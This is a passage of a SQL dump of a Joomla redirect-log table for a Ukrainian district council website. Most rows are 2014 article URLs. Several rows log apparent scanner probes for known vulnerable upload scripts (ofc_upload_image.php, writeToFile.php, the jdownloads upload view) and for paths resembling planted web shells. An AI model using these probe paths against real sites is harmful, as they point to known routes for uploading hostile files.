00:00:00',301),(5195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-------qq&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-27 08:52:09','0000-00-00 00:00:00',301),(5196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-------qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-27 08:52:15','0000-00-00 00:00:00',301),(5197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-------qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-27 08:52:17','0000-00-00 00:00:00',301),(5198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-27 08:52:21','0000-00-00 00:00:00',301),(5199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-27 08:52:26','0000-00-00 00:00:00',301),(5200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-09-27 08:52:31','0000-00-00 00:00:00',301),(5201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-27 08:52:38','0000-00-00 00:00:00',301),(5202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-27 08:52:44','0000-00-00 00:00:00',301),(5203,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-27 08:52:47','0000-00-00 00:00:00',301),(5204,'http://www.malyn-rayrada.org.ua/index.php?view=category&id=5:2010-06-05-12-51-34&option=com_content&Itemid=18&lang=ru','','','',1,0,'2014-09-27 08:53:18','0000-00-00 00:00:00',301),(5205,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1218:2014-02-21-15-02-18&lang=uk&option=com_content&view=article','','','',5,0,'2014-09-27 09:21:36','0000-00-00 00:00:00',301),(5206,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1330:2014-06-03-06-17-00&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-27 09:21:42','0000-00-00 00:00:00',301),(5207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=uk','','','',2,0,'2014-09-27 09:47:11','0000-00-00 00:00:00',301),(5208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=ru','','','',2,0,'2014-09-27 09:49:16','0000-00-00 00:00:00',301),(5209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-27 09:49:20','0000-00-00 00:00:00',301),(5210,'http://www.malyn-rayrada.org.ua/web/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-27 10:00:28','0000-00-00 00:00:00',301),(5211,'http://www.malyn-rayrada.org.ua/web/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-27 10:00:32','0000-00-00 00:00:00',301),(5212,'http://www.malyn-rayrada.org.ua/web/components/com_community/index.html','','','',8,0,'2014-09-27 10:00:35','0000-00-00 00:00:00',301),(5213,'http://www.malyn-rayrada.org.ua/web/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-27 10:00:39','0000-00-00 00:00:00',301),(5214,'http://www.malyn-rayrada.org.ua/web/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-27 10:00:43','0000-00-00 00:00:00',301),(5215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=ru','','','',2,0,'2014-09-27 10:00:50','0000-00-00 00:00:00',301),(5216,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=en','','','',3,0,'2014-09-27 10:00:55','0000-00-00 00:00:00',301),(5217,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-27 10:03:59','0000-00-00 00:00:00',301),(5218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-27 10:04:51','0000-00-00 00:00:00',301),(5219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-27 10:08:52','0000-00-00 00:00:00',301),(5220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=ru','','','',2,0,'2014-09-27 10:17:28','0000-00-00 00:00:00',301),(5221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-27 10:20:27','0000-00-00 00:00:00',301),(5222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-27 10:20:29','0000-00-00 00:00:00',301),(5223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-27 10:37:22','0000-00-00 00:00:00',301),(5224,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=uk','','','',2,0,'2014-09-27 10:52:35','0000-00-00 00:00:00',301),(5225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-27 11:07:43','0000-00-00 00:00:00',301),(5226,'http://www.malyn-rayrada.org.ua/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',147,0,'2014-09-27 11:55:38','0000-00-00 00:00:00',301),(5227,'http://www.malyn-rayrada.org.ua/new/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-27 11:55:40','0000-00-00 00:00:00',301),(5228,'http://www.malyn-rayrada.org.ua/new/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-27 11:55:44','0000-00-00 00:00:00',301),(5229,'http://www.malyn-rayrada.org.ua/new/components/com_community/index.html','','','',15,0,'2014-09-27 11:55:47','0000-00-00 00:00:00',301),(5230,'http://www.malyn-rayrada.org.ua/new/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-27 11:55:51','0000-00-00 00:00:00',301),(5231,'http://www.malyn-rayrada.org.ua/new/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-27 11:55:55','0000-00-00 00:00:00',301);
INSERT INTO `fw3gt_redirect_links` VALUES (5232,'http://www.malyn-rayrada.org.ua/new/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',9,0,'2014-09-27 11:56:03','0000-00-00 00:00:00',301),(5233,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=uk','','','',4,0,'2014-09-27 12:59:28','0000-00-00 00:00:00',301),(5234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-27 12:59:29','0000-00-00 00:00:00',301),(5235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59&Itemid=107&lang=ru','','','',4,0,'2014-09-27 13:30:30','0000-00-00 00:00:00',301),(5236,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1034:2013-06-23-15-11-25&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-27 13:38:09','0000-00-00 00:00:00',301),(5237,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1263:2014-03-31-14-00-08&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-27 14:04:52','0000-00-00 00:00:00',301),(5238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-27 14:30:12','0000-00-00 00:00:00',301),(5239,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=en&Itemid=','','','',2,0,'2014-09-27 14:35:28','0000-00-00 00:00:00',301),(5240,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=en','','','',2,0,'2014-09-27 14:45:26','0000-00-00 00:00:00',301),(5241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-27 15:13:34','0000-00-00 00:00:00',301),(5242,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-27 15:13:36','0000-00-00 00:00:00',301),(5243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-27 15:31:10','0000-00-00 00:00:00',301),(5244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-27 15:31:17','0000-00-00 00:00:00',301),(5245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-27 15:31:27','0000-00-00 00:00:00',301),(5246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-27 15:31:54','0000-00-00 00:00:00',301),(5247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-27 15:32:00','0000-00-00 00:00:00',301),(5248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48&Itemid=87&lang=ru','','','',1,0,'2014-09-27 15:32:33','0000-00-00 00:00:00',301),(5249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48&Itemid=87&lang=uk','','','',3,0,'2014-09-27 15:32:39','0000-00-00 00:00:00',301),(5250,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-27 15:51:00','0000-00-00 00:00:00',301),(5251,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-27 15:51:02','0000-00-00 00:00:00',301),(5252,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-27 15:51:05','0000-00-00 00:00:00',301),(5253,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-27 15:51:07','0000-00-00 00:00:00',301),(5254,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-27 15:51:09','0000-00-00 00:00:00',301),(5255,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1361:-32-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-27 15:51:12','0000-00-00 00:00:00',301),(5256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-27 15:51:39','0000-00-00 00:00:00',301),(5257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-27 15:51:41','0000-00-00 00:00:00',301),(5258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-27 15:58:12','0000-00-00 00:00:00',301),(5259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47:-21022013-&Itemid=86&lang=ru','','','',5,0,'2014-09-27 18:06:44','0000-00-00 00:00:00',301),(5260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47:-21022013-&Itemid=86&lang=uk','','','',1,0,'2014-09-27 18:06:54','0000-00-00 00:00:00',301),(5261,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','http://www.google.com.ua/url?url=http://malyn-rayrada.org.ua/index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D1103%253A2013-10-03-09-29-30%26c','',2,0,'2014-09-27 18:11:31','0000-00-00 00:00:00',301),(5262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-27 18:22:37','0000-00-00 00:00:00',301),(5263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-27 18:51:33','0000-00-00 00:00:00',301),(5264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-27 18:59:51','0000-00-00 00:00:00',301),(5265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-27 19:01:45','0000-00-00 00:00:00',301),(5266,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47:-21022013-&Itemid=86&lang=ru','','','',6,0,'2014-09-27 19:06:46','0000-00-00 00:00:00',301),(5267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',15,0,'2014-09-27 19:13:26','0000-00-00 00:00:00',301),(5268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-27 19:34:05','0000-00-00 00:00:00',301),(5269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-27 19:53:43','0000-00-00 00:00:00',301),(5270,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=970:-90-&lang=en&option=com_content&view=article','','','',4,0,'2014-09-27 20:23:26','0000-00-00 00:00:00',301),(5271,'http://www.malyn-rayrada.org.ua/ukr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-27 20:44:17','0000-00-00 00:00:00',301),(5272,'http://www.malyn-rayrada.org.ua/ukr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-27 20:44:21','0000-00-00 00:00:00',301),(5273,'http://www.malyn-rayrada.org.ua/ukr/components/com_community/index.html','','','',1,0,'2014-09-27 20:44:24','0000-00-00 00:00:00',301),(5274,'http://www.malyn-rayrada.org.ua/ukr/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-27 20:44:28','0000-00-00 00:00:00',301),(5275,'http://www.malyn-rayrada.org.ua/ukr/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-27 20:44:32','0000-00-00 00:00:00',301),(5276,'http://www.malyn-rayrada.org.ua/ukr/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-09-27 20:44:38','0000-00-00 00:00:00',301),(5277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-27 20:59:31','0000-00-00 00:00:00',301),(5278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-27 21:53:39','0000-00-00 00:00:00',301),(5279,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=941:2013-02-27-14-30-15&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-27 21:57:45','0000-00-00 00:00:00',301),(5280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-27 22:28:02','0000-00-00 00:00:00',301),(5281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-27 23:59:28','0000-00-00 00:00:00',301),(5282,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-28 00:17:13','0000-00-00 00:00:00',301),(5283,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-28 00:36:11','0000-00-00 00:00:00',301),(5284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-28 00:41:08','0000-00-00 00:00:00',301),(5285,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-28 00:50:20','0000-00-00 00:00:00',301),(5286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56:--03022014-&Itemid=97&lang=ru','','','',8,0,'2014-09-28 00:55:03','0000-00-00 00:00:00',301),(5287,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&lang=uk&option=com_content&view=article','','','',4,0,'2014-09-28 00:59:06','0000-00-00 00:00:00',301),(5288,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-28 01:17:44','0000-00-00 00:00:00',301),(5289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-28 01:56:40','0000-00-00 00:00:00',301),(5290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-28 01:59:04','0000-00-00 00:00:00',301),(5291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:-21022013-&Itemid=86&lang=uk','','','',7,0,'2014-09-28 02:03:30','0000-00-00 00:00:00',301),(5292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-09-28 02:03:32','0000-00-00 00:00:00',301),(5293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-28 02:31:42','0000-00-00 00:00:00',301),(5294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56:--03022014-&Itemid=97&lang=ru','','','',13,0,'2014-09-28 02:48:29','0000-00-00 00:00:00',301),(5295,'http://malyn-rayrada.org.ua/administrator/components/com_banners/web-infor.php','','','',1,0,'2014-09-28 02:51:46','0000-00-00 00:00:00',301),(5296,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:-21022013-&Itemid=86&lang=uk','','','',7,0,'2014-09-28 03:01:33','0000-00-00 00:00:00',301),(5297,'http://malyn-rayrada.org.ua/modules/mod_main_wrap/mod_main_wrap.php','','','',1,0,'2014-09-28 03:34:40','0000-00-00 00:00:00',301),(5298,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-28 03:43:18','0000-00-00 00:00:00',301),(5299,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-28 03:45:40','0000-00-00 00:00:00',301),(5300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-28 03:51:40','0000-00-00 00:00:00',301),(5301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46&Itemid=85&lang=ru','','','',9,0,'2014-09-28 03:54:02','0000-00-00 00:00:00',301),(5302,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-28 03:54:19','0000-00-00 00:00:00',301),(5303,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-28 03:58:41','0000-00-00 00:00:00',301),(5304,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-28 04:01:12','0000-00-00 00:00:00',301),(5305,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32&id=853:2012-12-11-13-39-46&lang=ru&option=com_content&view=article','','','',4,0,'2014-09-28 04:15:23','0000-00-00 00:00:00',301),(5306,'http://malyn-rayrada.org.ua/components/com_contact/core.php','','','',1,0,'2014-09-28 04:26:22','0000-00-00 00:00:00',301),(5307,'http://malyn-rayrada.org.ua/modules/mod_araticlhess/mod_araticlhess.php','','','',7,0,'2014-09-28 04:26:22','0000-00-00 00:00:00',301),(5308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=en&Itemid=0','','','',5,0,'2014-09-28 04:41:28','0000-00-00 00:00:00',301),(5309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=en','','','',1,0,'2014-09-28 04:41:31','0000-00-00 00:00:00',301),(5310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49:--12042013-&Itemid=88&lang=ru','','','',8,0,'2014-09-28 04:50:57','0000-00-00 00:00:00',301),(5311,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49&Itemid=88&lang=uk','','','',4,0,'2014-09-28 04:57:18','0000-00-00 00:00:00',301),(5312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-28 05:08:55','0000-00-00 00:00:00',301),(5313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-28 05:17:38','0000-00-00 00:00:00',301),(5314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49&Itemid=88&lang=ru','','','',2,0,'2014-09-28 05:25:30','0000-00-00 00:00:00',301),(5315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-28 05:46:05','0000-00-00 00:00:00',301),(5316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-09-28 05:49:26','0000-00-00 00:00:00',301),(5317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59&Itemid=107&lang=uk','','','',5,0,'2014-09-28 05:50:14','0000-00-00 00:00:00',301),(5318,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1033:2013-06-18-12-58-36&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-28 05:50:35','0000-00-00 00:00:00',301),(5319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',13,0,'2014-09-28 05:50:37','0000-00-00 00:00:00',301),(5320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59:--20062014-&Itemid=107&lang=ru','','','',3,0,'2014-09-28 05:57:51','0000-00-00 00:00:00',301),(5321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49:--12042013-&Itemid=88&lang=uk','','','',3,0,'2014-09-28 06:09:45','0000-00-00 00:00:00',301),(5322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-09-28 06:23:18','0000-00-00 00:00:00',301),(5323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53&Itemid=94&lang=en','','','',3,0,'2014-09-28 06:45:32','0000-00-00 00:00:00',301),(5324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-28 06:49:32','0000-00-00 00:00:00',301),(5325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-28 07:03:55','0000-00-00 00:00:00',301),(5326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59&Itemid=107&lang=ru','','','',8,0,'2014-09-28 07:11:09','0000-00-00 00:00:00',301),(5327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-28 07:22:22','0000-00-00 00:00:00',301),(5328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46&Itemid=85&lang=ru','','','',5,0,'2014-09-28 07:36:42','0000-00-00 00:00:00',301),(5329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54&Itemid=95&lang=uk','','','',2,0,'2014-09-28 07:37:41','0000-00-00 00:00:00',301),(5330,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-28 07:42:28','0000-00-00 00:00:00',301),(5331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49&Itemid=88&lang=uk','','','',3,0,'2014-09-28 07:45:37','0000-00-00 00:00:00',301),(5332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59:--20062014-&Itemid=107&lang=ru','','','',3,0,'2014-09-28 07:45:41','0000-00-00 00:00:00',301),(5333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54:--29112013-&Itemid=95&lang=ru','','','',1,0,'2014-09-28 07:45:51','0000-00-00 